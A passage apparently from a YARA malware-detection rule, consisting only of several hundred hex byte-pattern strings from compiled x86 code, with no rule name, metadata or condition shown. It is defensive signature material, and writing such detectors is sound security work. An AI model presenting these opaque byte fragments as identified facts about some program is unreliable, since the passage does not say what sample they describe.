    $op518 = { 3D 23 00 00 C0 74 0B 3D 05 00 00 80 0F 85 DF }
    $op519 = { 3D 23 00 00 C0 75 61 8B 45 FC 8D 44 00 02 50 89 }
    $op520 = { 83 C4 14 89 45 10 83 F8 FF 0F 84 B6 }
    $op521 = { 59 59 85 C0 0F 85 34 02 00 00 68 C0 59 43 00 FF }
    $op522 = { 89 74 24 74 89 74 24 78 FF 90 BC 02 00 00 85 C0 }
    $op523 = { 89 74 24 74 89 74 24 78 FF 90 BC 02 00 00 85 C0 }
    $op524 = { A1 70 A0 42 00 89 81 28 01 00 00 A1 9C A0 42 00 }
    $op525 = { 89 5D B0 89 5D B4 FF 90 BC 02 00 00 BF 34 00 00 }
    $op526 = { 83 C4 14 C6 04 37 00 8B C7 5F 5E C3 55 8B EC 83 }
    $op527 = { FF 90 0C 03 00 00 3D 22 00 00 C0 0F 85 86 }
    $op528 = { 85 C0 0F 84 A9 FD FF FF FF 74 24 18 A1 A8 79 44 }
    $op529 = { 7C 16 43 00 C7 84 24 88 }
    $op530 = { 59 97 41 00 C7 41 6C F8 18 40 00 C7 81 34 01 00 }
    $op531 = { 8B 48 10 3B CB 0F 84 EB }
    $op532 = { 89 44 24 1C 8D 47 44 50 FF 75 0C A1 A8 79 44 00 }
    $op533 = { 85 C0 75 13 8B 45 F0 66 83 78 02 3A 75 09 66 8B }
    $op534 = { 2A 43 00 C7 84 24 68 01 00 00 10 2A 43 00 C7 84 }
    $op535 = { C8 EE 42 00 C7 84 24 AC }
    $op536 = { 83 C4 0C 6A 0A 83 C7 10 57 56 8D 45 EC 50 FF 75 }
    $op537 = { 31 43 00 C7 84 24 50 03 00 00 0C 31 43 00 C7 84 }
    $op538 = { 80 18 43 00 C7 84 24 00 01 00 00 A4 18 43 00 C7 }
    $op539 = { FF 76 08 A1 A8 79 44 00 FF 50 78 8B D8 A1 A8 79 }
    $op540 = { 1C 6A 43 00 C7 84 24 E4 }
    $op541 = { A1 A8 79 44 00 68 50 E5 43 00 53 FF 90 90 }
    $op542 = { 59 59 85 C0 0F 85 51 02 00 00 68 9C 59 43 00 FF }
    $op543 = { 8B D8 0F B7 05 B8 79 44 00 50 A1 A8 79 44 00 68 }
    $op544 = { 18 68 43 00 C7 84 24 94 }
    $op545 = { 89 75 DC 89 75 E0 89 75 F4 FF 90 F8 }
    $op546 = { 59 59 85 C0 0F 85 C5 02 00 00 68 28 59 43 00 FF }
    $op547 = { E0 EE 42 00 C7 84 24 B4 }
    $op548 = { 4E 91 40 00 A1 CC A0 42 00 89 81 54 03 00 00 C7 }
    $op549 = { A3 43 00 C7 84 24 8C 0B 00 00 0C A3 43 00 C7 84 }
    $op550 = { 5C AE 43 00 C7 84 24 B8 }
    $op551 = { 68 34 5B 43 00 FF 75 88 A1 A8 79 44 00 FF 90 90 }
    $op552 = { 59 59 85 C0 0F 85 DD 01 00 00 68 24 5A 43 00 FF }
    $op553 = { 59 59 85 C0 0F 85 AD 03 00 00 68 8C 54 43 00 FF }
    $op554 = { 83 C4 24 FF 4E 24 8B 46 24 74 4F 6A 01 C1 E0 02 }
    $op555 = { 59 59 85 C0 0F 85 9F 06 00 00 68 B0 52 43 00 FF }
    $op556 = { 5F 85 C0 74 04 32 C0 C9 C3 56 8D 45 F8 50 FF 75 }
    $op557 = { 68 FE FF 00 00 FF 75 08 89 44 24 1C A1 A8 79 44 }
    $op558 = { 6A 2F 8D 45 B8 50 FF 75 7C A1 A8 79 44 00 C7 45 }
    $op559 = { 68 8C 41 43 00 50 A1 A8 79 44 00 53 FF 90 50 01 }
    $op560 = { 8C 16 43 00 C7 84 24 8C }
    $op561 = { EC EF 42 00 C7 84 24 F8 }
    $op562 = { 83 C4 14 38 1D B1 79 44 00 74 59 A1 A8 79 44 00 }
    $op563 = { FF 75 F8 8B F8 FF 75 0C A1 A8 79 44 00 68 70 14 }
    $op564 = { 57 FF 75 10 56 FF 90 9C 02 00 00 53 FF 76 08 8B }
    $op565 = { 59 59 85 C0 75 36 68 4C 58 43 00 FF 75 B8 A1 A8 }
    $op566 = { 59 59 85 C0 0F 85 FF 02 00 00 68 48 55 43 00 FF }
    $op567 = { D6 22 41 00 C7 81 18 01 }
    $op568 = { 68 6A 43 00 C7 84 24 EC }
    $op569 = { 89 75 B8 89 75 BC FF 90 0C 03 00 00 85 C0 0F 85 }
    $op570 = { 56 8B D8 A1 A8 79 44 00 68 D0 B8 41 00 53 FF 90 }
    $op571 = { 8B 0D A8 79 44 00 53 66 89 45 0A FF 91 E8 }
    $op572 = { 68 20 B1 42 00 68 3C B1 42 00 8B F0 A1 A8 79 44 }
    $op573 = { 14 B4 42 00 C7 84 24 BC }
    $op574 = { 59 59 85 C0 0F 85 0E 06 00 00 68 10 53 43 00 FF }
    $op575 = { 59 59 85 C0 74 15 6A 00 57 50 A1 A8 79 44 00 56 }
    $op576 = { 08 F0 42 00 C7 84 24 FC }
    $op577 = { A1 A8 79 44 00 83 C4 50 FF 75 FC 57 68 64 C7 43 }
    $op578 = { A4 6A 43 00 C7 84 24 F8 }
    $op579 = { 8C 3C 44 00 C7 84 24 F8 }
    $op580 = { 8B F8 A1 A8 79 44 00 68 47 80 00 00 53 FF 90 B8 }
    $op581 = { 59 59 85 C0 75 7B A1 A8 79 44 00 68 30 DE 43 00 }
    $op582 = { 83 C4 10 89 44 24 10 8D 44 24 24 50 56 FF 74 24 }
    $op583 = { 90 3B 44 00 C7 84 24 A0 }
    $op584 = { BC 3B 44 00 C7 84 24 B4 }
    $op585 = { 89 45 FC 8D 47 44 50 FF 75 10 A1 A8 79 44 00 68 }
    $op586 = { 9C 43 44 00 C7 84 24 FC }
    $op587 = { FF 75 10 8B F8 A1 A8 79 44 00 68 DC B6 42 00 56 }
    $op588 = { 3C 43 44 00 C7 84 24 E8 }
    $op589 = { 59 59 85 C0 75 4D A1 A8 79 44 00 68 7C DE 43 00 }
    $op590 = { 68 88 57 43 00 FF 75 B8 A1 A8 79 44 00 FF 90 90 }
    $op591 = { 94 EF 42 00 C7 84 24 E8 }
    $op592 = { 68 B4 5B 44 00 50 A1 A8 79 44 00 53 FF 90 50 01 }
    $op593 = { FF 75 10 6A 00 FF 75 0C A1 A8 79 44 00 FF 90 9C }
    $op594 = { FF 75 10 6A 00 FF 75 0C A1 A8 79 44 00 FF 90 9C }
    $op595 = { A1 A8 79 44 00 83 C4 50 FF 74 24 18 68 7C 63 43 }
    $op596 = { A4 3B 44 00 C7 84 24 AC }
    $op597 = { 59 16 40 00 C7 81 A0 01 00 00 BC 2F 40 00 A1 88 }
    $op598 = { 85 C0 75 4E 50 FF 74 24 14 A1 A8 79 44 00 68 3C }
    $op599 = { A4 17 43 00 C7 84 24 C4 }
    $op600 = { 30 27 43 00 C7 84 24 9C }
    $op601 = { 74 0A C7 05 D4 79 44 00 06 }
    $op602 = { 59 59 85 C0 0F 85 A3 01 00 00 68 78 56 43 00 FF }
    $op603 = { 18 EF 42 00 C7 84 24 C8 }
    $op604 = { 84 EF 42 00 C7 84 24 E4 }
    $op605 = { DC B4 42 00 C7 84 24 00 01 00 00 EC B4 42 00 C7 }
    $op606 = { 59 59 8B D8 FF 74 BD 88 A1 A8 79 44 00 68 D0 06 }
    $op607 = { 60 18 43 00 C7 84 24 FC }
    $op608 = { 85 C0 75 2B FF 75 10 A1 A8 79 44 00 FF 75 0C FF }
    $op609 = { 89 45 F0 66 8B 45 EC 59 66 89 45 EE 59 8D 45 EC }
    $op610 = { 0F 82 52 FF FF FF A1 A8 79 44 00 53 FF 75 08 FF }
    $op611 = { FF 75 10 A1 A8 79 44 00 56 FF 90 74 02 00 00 83 }
    $op612 = { 5C 43 44 00 C7 84 24 F0 }
    $op613 = { 68 54 5B 43 00 FF 75 88 A1 A8 79 44 00 FF 90 90 }
    $op614 = { 59 59 85 C0 0F 85 B7 05 00 00 68 4C 53 43 00 FF }
    $op615 = { A1 A8 79 44 00 56 53 6A 04 68 F8 A0 42 00 FF 90 }
    $op616 = { 59 59 85 C0 0F 85 C5 02 00 00 68 94 55 43 00 FF }
    $op617 = { 59 59 89 45 FC 8B 45 F4 48 48 50 FF 75 18 8B 45 }
    $op618 = { 59 59 85 C0 0F 85 1C 03 00 00 68 38 55 43 00 FF }
    $op619 = { 83 C4 18 89 45 8C 83 7D 8C 00 0F 84 07 04 00 00 }
    $op620 = { 59 59 85 C0 0F 85 1A 01 00 00 A1 A8 79 44 00 68 }
    $op621 = { 59 59 85 C0 0F 85 D4 05 00 00 68 38 53 43 00 FF }
    $op622 = { A1 A8 79 44 00 68 08 62 44 00 FF 75 F8 56 FF 90 }
    $op623 = { C8 F9 42 00 C7 84 24 EC }
    $op624 = { FF 75 F0 A1 A8 79 44 00 53 68 B4 C8 43 00 68 C8 }
    $op625 = { FF 75 EC A1 A8 79 44 00 68 E8 C7 43 00 56 FF 50 }
    $op626 = { 85 C0 75 4D 8B 45 0C 66 83 78 02 3F 50 A1 A8 79 }
    $op627 = { 66 83 79 38 02 0F 86 D5 }
    $op628 = { FF 75 F4 A1 A8 79 44 00 57 68 20 C8 43 00 68 2C }
    $op629 = { FF 75 D0 8B 4D F8 8B 45 CC FF 75 14 03 C1 03 45 }
    $op630 = { 68 80 5B 43 00 FF 75 88 A1 A8 79 44 00 FF 90 90 }
    $op631 = { 4C 27 43 00 C7 84 24 A4 }
    $op632 = { A1 A8 79 44 00 68 E4 44 43 00 56 53 FF 90 08 01 }
    $op633 = { 58 EF 42 00 C7 84 24 D8 }
    $op634 = { 8D 85 00 FE FF FF 68 98 80 43 00 68 FF }
    $op635 = { 59 59 85 C0 0F 85 90 03 00 00 68 AC 54 43 00 FF }
    $op636 = { 8B 45 FC 8D 04 86 03 43 3A 50 A1 A8 79 44 00 FF }
    $op637 = { 54 68 43 00 C7 84 24 9C }
    $op638 = { 68 B0 46 43 00 FF 75 08 8B F8 A1 A8 79 44 00 FF }
    $op639 = { 64 3B 44 00 C7 84 24 8C }
    $op640 = { 89 44 24 60 8B 44 24 48 83 C0 44 68 CC 7F 43 00 }
    $op641 = { 59 59 85 C0 0F 85 9A 05 00 00 68 60 53 43 00 FF }
    $op642 = { A1 A8 79 44 00 53 FF 75 08 FF 90 B8 }
    $op643 = { 8B 5D 10 85 C0 75 35 A1 A8 79 44 00 53 8D B8 C4 }
    $op644 = { A1 A8 79 44 00 56 FF 50 28 A1 A8 79 44 00 6A 13 }
    $op645 = { 2C 3C 44 00 C7 84 24 DC }
    $op646 = { 44 3C 44 00 C7 84 24 E4 }
    $op647 = { 08 AE 43 00 C7 84 24 A4 }
    $op648 = { 94 69 43 00 C7 84 24 D4 }
    $op649 = { 83 C8 FF E9 5C 01 00 00 83 65 08 00 8D 45 08 50 }
    $op650 = { FF 75 FC A1 A8 79 44 00 68 38 B0 42 00 FF 75 14 }
    $op651 = { 71 32 40 00 C7 81 4C 01 00 00 6A 6B 40 00 A1 D4 }
    $op652 = { 3C 68 43 00 C7 84 24 98 }
    $op653 = { 59 59 85 C0 0F 85 4C 01 00 00 68 A4 5A 43 00 FF }
    $op654 = { C0 AE 43 00 C7 84 24 D0 }
    $op655 = { 70 3B 44 00 C7 84 24 90 }
    $op656 = { 59 59 85 C0 75 20 A1 A8 79 44 00 57 53 FF 90 60 }
    $op657 = { E4 3B 44 00 C7 84 24 C4 }
    $op658 = { D4 F8 42 00 C7 84 24 B8 }
    $op659 = { A1 8C A0 42 00 89 81 BC 02 00 00 A1 90 A0 42 00 }
    $op660 = { 64 EE 42 00 C7 84 24 98 }
    $op661 = { D4 F9 42 00 C7 84 24 F0 }
    $op662 = { 89 45 F4 8D 47 44 50 FF 75 0C A1 A8 79 44 00 68 }
    $op663 = { 89 45 F4 8D 47 44 50 FF 75 0C A1 A8 79 44 00 68 }
    $op664 = { FF 50 3C 8D 44 24 2C 89 44 24 58 8D 84 24 80 }
    $op665 = { 6C F8 42 00 C7 84 24 A0 }
    $op666 = { 68 38 5C 43 00 FF 75 88 A1 A8 79 44 00 FF 90 90 }
    $op667 = { 59 59 85 C0 74 5A A1 A8 79 44 00 68 FE FF 00 00 }
    $op668 = { 59 59 85 C0 74 5A A1 A8 79 44 00 68 FE FF 00 00 }
    $op669 = { 24 18 43 00 C7 84 24 F0 }
    $op670 = { 59 59 89 45 BC 8B 45 C0 FF 70 10 8B 45 C0 83 C0 }
    $op671 = { 8B 45 08 8B 50 18 3B CA 0F 82 27 01 00 00 8B 40 }
    $op672 = { 10 F8 42 00 C7 84 24 88 }
    $op673 = { FF 75 F4 A1 A8 79 44 00 68 3F 42 0F 00 68 64 C8 }
    $op674 = { 8D 45 E4 50 A1 A8 79 44 00 FF 90 F8 01 00 00 83 }
    $op675 = { 85 C0 0F 84 20 FA FF FF 5F FF 75 F0 A1 A8 79 44 }
    $op676 = { 30 69 43 00 C7 84 24 C0 }
    $op677 = { 8D 43 00 C7 84 24 40 05 00 00 14 8D 43 00 C7 84 }
    $op678 = { 68 98 58 43 00 FF 75 B8 A1 A8 79 44 00 FF 90 90 }
    $op679 = { 8B 5D FC 3B DE 75 05 39 75 F4 74 7B 33 C0 3B DE }
    $op680 = { 85 C0 75 15 8D 45 F8 50 FF D6 8D 45 F8 50 A1 A8 }
    $op681 = { 59 59 85 C0 0F 85 DE 07 00 00 68 E0 51 43 00 FF }
    $op682 = { 0F B7 48 48 66 85 C9 7E 77 0F BF D1 39 55 F0 7F }
    $op683 = { 59 59 85 C0 0F 85 21 04 00 00 68 58 54 43 00 FF }
    $op684 = { 59 59 85 C0 0F 85 52 08 00 00 68 B0 51 43 00 FF }
    $op685 = { A0 28 43 00 C7 84 24 00 01 00 00 B0 28 43 00 C7 }
    $op686 = { A4 42 44 00 C7 84 24 D8 }
    $op687 = { 81 7C 24 14 10 27 00 00 0F 8F CC }
    $op688 = { 24 EF 42 00 C7 84 24 CC }
    $op689 = { 59 59 85 C0 0F 85 AB 01 00 00 A1 A8 79 44 00 68 }
    $op690 = { A1 94 A0 42 00 89 81 94 }
    $op691 = { 8C B3 42 00 C7 84 24 A0 }
    $op692 = { 8B 5D 08 8B F8 A1 A8 79 44 00 68 80 49 43 00 53 }
    $op693 = { 89 5C 24 64 89 5C 24 68 FF 90 0C 03 00 00 85 C0 }
    $op694 = { 89 5C 24 64 89 5C 24 68 FF 90 0C 03 00 00 85 C0 }
    $op695 = { FF 75 10 8B 5D 0C 8B F8 A1 A8 79 44 00 53 89 7D }
    $op696 = { 51 8D B8 84 02 00 00 FF 90 7C 01 00 00 59 03 C0 }
    $op697 = { 54 B4 42 00 C7 84 24 D4 }
    $op698 = { 08 28 43 00 C7 84 24 D8 }
    $op699 = { FB D9 40 00 C7 81 10 04 00 00 CB 58 41 00 C7 81 }
    $op700 = { CC B4 42 00 C7 84 24 FC }
    $op701 = { 59 59 85 C0 75 1D 68 70 58 43 00 FF 75 B8 A1 A8 }
    $op702 = { 59 59 85 C0 0F 85 CF 04 00 00 68 E0 53 43 00 FF }
    $op703 = { 57 8B 7D 08 8D 45 FE 50 8B 45 0C FF 34 B0 A1 A8 }
    $op704 = { 59 59 85 C0 0F 85 FC 01 00 00 A1 A8 79 44 00 68 }
    $op705 = { 89 44 24 6C 8B 44 24 44 83 C0 44 50 FF 74 24 50 }
    $op706 = { 59 59 85 C0 0F 85 83 02 00 00 FF 75 E0 A1 A8 79 }
    $op707 = { 59 59 8D 44 24 08 50 A1 A8 79 44 00 FF 90 A4 02 }
    $op708 = { 85 C0 75 3A A1 A8 79 44 00 6A 01 68 3C 3D 44 00 }
    $op709 = { 74 B4 42 00 C7 84 24 DC }
    $op710 = { A8 B3 42 00 C7 84 24 A4 }
    $op711 = { A1 E0 A0 42 00 89 81 28 04 00 00 A1 44 A0 42 00 }
    $op712 = { 60 B4 42 00 C7 84 24 D8 }
    $op713 = { F4 67 43 00 C7 84 24 8C }
    $op714 = { 59 59 89 45 D0 8D 45 D8 50 68 FF 8F 00 00 FF 75 }
    $op715 = { 68 14 E3 43 00 FF 75 F8 89 45 CC A1 A8 79 44 00 }
    $op716 = { A1 A8 79 44 00 83 C4 50 FF 74 24 0C 68 1C 66 43 }
    $op717 = { 78 F8 42 00 C7 84 24 A4 }
    $op718 = { 9C 3C 44 00 C7 84 24 00 01 00 00 A8 3C 44 00 C7 }
    $op719 = { 9C 43 00 C7 84 24 8C 09 00 00 0C 9C 43 00 C7 84 }
    $op720 = { B4 17 43 00 C7 84 24 CC }
    $op721 = { 6C 3C 44 00 C7 84 24 F0 }
    $op722 = { 89 4D A4 FF 50 3C 8D 45 DC 89 45 BC 8D 45 9C 50 }
    $op723 = { 78 EF 42 00 C7 84 24 E0 }
    $op724 = { 54 B3 42 00 C7 84 24 94 }
    $op725 = { 83 65 FC 00 59 59 89 45 F8 8B 45 FC 8B 9C 85 90 }
    $op726 = { 90 28 43 00 C7 84 24 FC }
    $op727 = { C4 68 43 00 C7 84 24 B0 }
    $op728 = { BC AD 43 00 C7 84 24 8C }
    $op729 = { 0F B7 0D B8 79 44 00 53 51 68 24 E3 43 00 56 89 }
    $op730 = { 24 B3 42 00 C7 84 24 8C }
    $op731 = { 53 4C 41 00 C7 81 A8 02 00 00 DD 28 41 00 C7 81 }
    $op732 = { FF 75 F8 A1 A8 79 44 00 57 68 B4 C0 43 00 68 CC }
    $op733 = { 83 3D CC 79 44 00 00 75 0A C7 05 CC 79 44 00 9C }
    $op734 = { 34 44 00 C7 84 24 EC 02 00 00 10 34 44 00 C7 84 }
    $op735 = { 85 C0 75 3C FF 74 24 24 A1 A8 79 44 00 68 A8 2C }
    $op736 = { 1C B4 42 00 C7 84 24 C0 }
    $op737 = { 8D 45 E0 50 FF 75 F4 A1 A8 79 44 00 FF 90 54 02 }
    $op738 = { C4 3B 44 00 C7 84 24 B8 }
    $op739 = { 59 59 85 C0 0F 85 65 06 00 00 68 E0 52 43 00 FF }
    $op740 = { FF 76 08 8B F8 8D 46 0C 50 A1 A8 79 44 00 57 FF }
    $op741 = { 50 A1 A8 79 44 00 FF 50 0C 84 C0 A1 A8 79 44 00 }
    $op742 = { 59 59 85 C0 75 4F 68 B0 5C 43 00 FF 75 88 A1 A8 }
    $op743 = { 83 65 08 00 83 65 F8 00 59 59 66 8B 4E 02 66 49 }
    $op744 = { 8B F0 33 C0 66 89 45 DC 8D 7D DE AB 6A 08 FF 75 }
    $op745 = { 90 43 00 C7 84 24 10 06 00 00 0C 90 43 00 C7 84 }
    $op746 = { 59 59 85 C0 0F 85 82 06 00 00 68 C8 52 43 00 FF }
    $op747 = { 59 59 85 C0 75 64 A1 A8 79 44 00 68 58 DE 43 00 }
    $op748 = { 59 59 89 45 E8 83 65 CC 00 83 65 E4 00 68 FE FF }
    $op749 = { 85 C0 74 14 8D 45 D0 50 A1 A8 79 44 00 FF 90 A4 }
    $op750 = { A1 A8 79 44 00 56 68 00 10 00 00 FF 75 08 FF 90 }
    $op751 = { 59 59 85 C0 0F 85 A8 02 00 00 68 3C 59 43 00 FF }
    $op752 = { 51 53 50 A1 A8 79 44 00 57 FF 90 BC 01 00 00 8B }
    $op753 = { 37 44 00 C7 84 24 AC 03 00 00 10 37 44 00 C7 84 }
    $op754 = { 89 5D DC 89 5D E0 FF 90 BC 02 00 00 85 C0 0F 85 }
    $op755 = { 89 5D DC 89 5D E0 FF 90 BC 02 00 00 85 C0 0F 85 }
    $op756 = { 68 B8 09 44 00 FF 75 FC FF 91 60 01 00 00 8B 0D }
    $op757 = { 59 59 85 C0 75 36 68 EC 5B 43 00 FF 75 88 A1 A8 }
    $op758 = { FF 90 84 01 00 00 5F 85 C0 74 04 32 C0 C9 C3 8B }
    $op759 = { 84 B4 42 00 C7 84 24 E4 }
    $op760 = { 59 59 85 C0 0F 85 78 04 00 00 68 1C 54 43 00 FF }
    $op761 = { 59 59 85 C0 0F 85 D9 06 00 00 68 7C 52 43 00 FF }
    $op762 = { A8 AD 43 00 C7 84 24 84 }
    $op763 = { 93 36 40 00 C7 81 64 01 00 00 6E 98 41 00 A1 78 }
    $op764 = { 78 28 43 00 C7 84 24 F8 }
    $op765 = { 8D 85 00 FE FF FF 68 6C 80 43 00 68 FF }
    $op766 = { A1 A8 79 44 00 83 C4 40 56 FF 90 E4 03 00 00 A1 }
    $op767 = { 83 C4 1C 89 44 24 14 6A 01 E9 9B 03 00 00 8B 44 }
    $op768 = { 2E 43 00 C7 84 24 70 02 00 00 10 2E 43 00 C7 84 }
    $op769 = { A1 6C A0 42 00 C7 41 1C 1F 4C 41 00 89 81 F8 }
    $op770 = { F0 17 43 00 C7 84 24 DC }
    $op771 = { BC 27 43 00 C7 84 24 C4 }
    $op772 = { 59 59 8B 45 C0 05 00 10 00 00 50 A1 A8 79 44 00 }
    $op773 = { 59 59 85 C0 0F 85 4C 01 00 00 68 F8 56 43 00 FF }
    $op774 = { 8D 44 24 24 50 FF 74 24 1C A1 A8 79 44 00 FF 90 }
    $op775 = { FF 74 24 34 A1 A8 79 44 00 68 AC 65 43 00 68 BC }
    $op776 = { 96 43 00 C7 84 24 CC 07 00 00 0C 96 43 00 C7 84 }
    $op777 = { 33 F6 80 3D 93 79 44 00 00 75 1A A1 A8 79 44 00 }
    $op778 = { 59 59 85 C0 0F 85 FA 01 00 00 68 30 56 43 00 FF }
    $op779 = { 8B F0 A1 A8 79 44 00 83 C4 10 89 75 FC 85 F6 75 }
    $op780 = { A1 A8 79 44 00 68 6C E5 43 00 53 FF 90 90 }
    $op781 = { 59 59 8D 4D E4 51 56 50 53 89 45 F8 89 5D FC 53 }
    $op782 = { AC AE 43 00 C7 84 24 CC }
    $op783 = { 48 EE 42 00 C7 84 24 90 }
    $op784 = { 0F AF 45 9C 8D 70 08 A1 A8 79 44 00 56 FF 75 0C }
    $op785 = { 0C F9 42 00 C7 84 24 C4 }
    $op786 = { 89 44 24 18 8D 47 44 50 FF 75 0C A1 A8 79 44 00 }
    $op787 = { 8B 7D 0C EB 25 50 A1 A8 79 44 00 FF 90 E8 }
    $op788 = { 85 C0 0F 85 E9 05 00 00 57 BF FE FF 00 00 EB 02 }
    $op789 = { 59 59 89 46 3A 85 C0 74 BC 33 FF 8B 46 28 2B C7 }
    $op790 = { 8B F0 8B 45 0C 66 83 38 5C 59 59 89 75 F8 75 16 }
    $op791 = { 8B F0 8B 45 0C 66 83 38 5C 59 59 89 75 F8 75 16 }
    $op792 = { 59 59 85 C0 0F 85 7D 05 00 00 68 70 53 43 00 FF }
    $op793 = { 89 5D E0 89 5D E4 FF 90 BC 02 00 00 8B F8 81 FF }
    $op794 = { BC 6A 43 00 C7 84 24 00 01 00 00 CC 6A 43 00 C7 }
    $op795 = { 84 68 43 00 C7 84 24 A4 }
    $op796 = { 85 C0 0F 84 B4 FE FF FF FF 75 F8 A1 A8 79 44 00 }
    $op797 = { A1 A8 79 44 00 68 20 DE 43 00 53 FF 90 90 }
    $op798 = { E0 AD 43 00 C7 84 24 94 }
    $op799 = { DC CE 40 00 C7 81 30 01 00 00 BD 18 40 00 C7 81 }
    $op800 = { 59 59 85 C0 0F 85 4D 02 00 00 FF 75 D8 A1 A8 79 }
    $op801 = { 59 59 85 C0 0F 85 CA 03 00 00 68 80 54 43 00 FF }
    $op802 = { 59 33 DB 59 89 44 24 10 89 5C 24 14 BE 80 }
    $op803 = { 50 A1 A8 79 44 00 57 68 9C C8 43 00 68 AC C8 43 }
    $op804 = { FF 75 FC A1 A8 79 44 00 57 68 48 C7 43 00 68 5C }
    $op805 = { A1 A8 79 44 00 68 D4 5E 44 00 57 FF 90 F4 03 00 }
    $op806 = { A1 A8 79 44 00 56 FF 90 80 02 00 00 A1 A8 79 44 }
    $op807 = { FF 74 24 14 8B F0 A1 A8 79 44 00 56 FF 90 60 03 }
    $op808 = { A1 A8 79 44 00 83 C4 48 57 53 FF 90 2C 01 00 00 }
    $op809 = { FF 74 24 20 A1 A8 79 44 00 68 68 66 43 00 53 FF }
    $op810 = { FC B2 42 00 C7 84 24 84 }
    $op811 = { 83 4F 28 FF 83 67 24 00 59 59 5E 5B 5F C9 C3 55 }
    $op812 = { 64 AE 43 00 C7 84 24 BC }
    $op813 = { 50 A1 A8 79 44 00 FF 90 1C 01 00 00 83 C4 18 A1 }
    $op814 = { FF 75 10 8B F8 FF 75 0C A1 A8 79 44 00 68 18 5F }
    $op815 = { 59 59 85 C0 0F 85 37 01 00 00 A1 A8 79 44 00 68 }
    $op816 = { E4 26 43 00 C7 84 24 88 }
    $op817 = { FF 45 FC 81 7D FC 10 27 00 00 0F 8F FE }
    $op818 = { 59 59 85 C0 0F 85 A8 02 00 00 68 A4 55 43 00 FF }
    $op819 = { A1 A8 79 44 00 68 34 40 43 00 57 FF 90 40 01 00 }
    $op820 = { 59 59 85 C0 0F 85 6E 02 00 00 68 D8 55 43 00 FF }
    $op821 = { 56 8B F8 A1 A8 79 44 00 6A 00 57 FF 90 78 01 00 }
    $op822 = { A1 A8 79 44 00 68 F0 46 43 00 FF 75 08 FF 90 2C }
    $op823 = { 59 59 85 C0 0F 85 C1 07 00 00 68 F0 51 43 00 FF }
    $op824 = { 85 C0 0F 84 44 FF FF FF 32 DB EB 02 B3 01 A1 A8 }
    $op825 = { 4C 3B 44 00 C7 84 24 84 }
    $op826 = { 8B F8 A1 A8 79 44 00 56 53 89 7D FC FF 90 B8 }
    $op827 = { 0C EF 42 00 C7 84 24 C4 }
    $op828 = { 8C B4 42 00 C7 84 24 E8 }
    $op829 = { 59 59 8D 4C 24 4C 51 57 50 56 89 44 24 24 89 74 }
    $op830 = { A0 68 43 00 C7 84 24 A8 }
    $op831 = { 10 17 43 00 C7 84 24 A4 }
    $op832 = { A1 A8 79 44 00 68 FC 5E 44 00 57 FF 90 F4 03 00 }
    $op833 = { FF 74 24 40 A1 A8 79 44 00 68 0C 63 43 00 68 1C }
    $op834 = { FF 75 F0 A1 A8 79 44 00 53 68 D0 C8 43 00 68 E0 }
    $op835 = { 8B 46 04 8B 0D 9C 79 44 00 89 88 B4 }
    $op836 = { F8 AD 43 00 C7 84 24 9C }
    $op837 = { 87 19 40 00 C7 41 48 7B 61 40 00 C7 81 B8 03 00 }
    $op838 = { 50 AE 43 00 C7 84 24 B4 }
    $op839 = { 18 AF 43 00 C7 84 24 F0 }
    $op840 = { FF 75 F8 A1 A8 79 44 00 53 56 FF 50 14 FF 75 F8 }
    $op841 = { A8 F8 42 00 C7 84 24 B0 }
    $op842 = { 8D 45 FC 50 A1 A8 79 44 00 FF 90 F8 01 00 00 83 }
    $op843 = { 8D 45 FC 50 A1 A8 79 44 00 FF 90 F8 01 00 00 83 }
    $op844 = { 59 59 85 C0 0F 85 48 06 00 00 68 F0 52 43 00 FF }
    $op845 = { A1 A8 79 44 00 68 54 40 43 00 57 FF 90 40 01 00 }
    $op846 = { BB D0 3F 00 00 3B F3 6A 01 0F 8E 9F }
    $op847 = { 85 C0 75 49 A1 A8 79 44 00 53 FF 74 24 18 68 D8 }
    $op848 = { 68 CC 57 43 00 FF 75 B8 A1 A8 79 44 00 FF 90 90 }
    $op849 = { 85 C0 75 4F A1 A8 79 44 00 6A 01 FF 74 24 1C 68 }
    $op850 = { 9C 3B 44 00 C7 84 24 A8 }
    $op851 = { FF 74 24 48 A1 A8 79 44 00 68 E0 65 43 00 68 E8 }
    $op852 = { 5C F8 42 00 C7 84 24 9C }
    $op853 = { 68 00 08 00 00 FF 75 08 89 45 F0 A1 A8 79 44 00 }
    $op854 = { 59 59 85 C0 0F 85 A3 01 00 00 68 4C 5A 43 00 FF }
    $op855 = { 88 27 43 00 C7 84 24 B4 }
    $op856 = { 24 F8 42 00 C7 84 24 90 }
    $op857 = { 85 C0 0F 84 DD FE FF FF A1 A8 79 44 00 57 53 FF }
    $op858 = { 8B 55 F8 0F B6 12 0F B6 3F 8B 45 08 03 D7 59 81 }
    $op859 = { 55 8B EC A1 A8 79 44 00 83 EC 14 53 8B 5D 08 56 }
    $op860 = { 24 17 43 00 C7 84 24 A8 }
    $op861 = { 8B 75 10 8B 36 3B F3 0F 8D 92 }
    $op862 = { 59 59 85 C0 0F 85 2B 06 00 00 68 00 53 43 00 FF }
    $op863 = { 59 59 8B F0 A1 A8 79 44 00 56 68 FF 7F 00 00 FF }
    $op864 = { EC 3B 44 00 C7 84 24 C8 }
    $op865 = { 68 98 42 43 00 50 A1 A8 79 44 00 57 FF 90 50 01 }
    $op866 = { C4 69 43 00 C7 84 24 DC }
    $op867 = { 83 C4 38 85 C0 0F 85 BB 02 00 00 A1 A8 79 44 00 }
    $op868 = { 18 F8 42 00 C7 84 24 8C }
    $op869 = { 0C B3 42 00 C7 84 24 88 }
    $op870 = { 68 18 49 43 00 FF 75 08 8B F8 A1 A8 79 44 00 FF }
    $op871 = { E4 B3 42 00 C7 84 24 B0 }
    $op872 = { FF 76 04 A1 A8 79 44 00 FF 75 FC 53 68 14 5D 44 }
    $op873 = { 85 C0 74 14 8D 45 F4 50 A1 A8 79 44 00 FF 90 A4 }
    $op874 = { 66 8B D8 0F B7 07 50 A1 A8 79 44 00 FF 90 E8 }
    $op875 = { 66 8B D8 0F B7 07 50 A1 A8 79 44 00 FF 90 E8 }
    $op876 = { 83 C4 10 FF 45 FC 8B 45 FC 3B 45 F8 7C AF 5B A1 }
    $op877 = { 66 83 78 0A 3A 0F 85 B6 }
    $op878 = { 8B F8 A1 A8 79 44 00 83 C4 18 57 C7 07 1C 01 00 }
    $op879 = { B8 F8 42 00 C7 84 24 B4 }
    $op880 = { 89 44 24 18 33 C0 66 89 44 24 30 8D 7C 24 32 AB }
    $op881 = { A1 A8 79 44 00 FF 74 24 34 68 10 80 43 00 56 FF }
    $op882 = { FF 75 FC A1 A8 79 44 00 53 68 88 C7 43 00 68 98 }
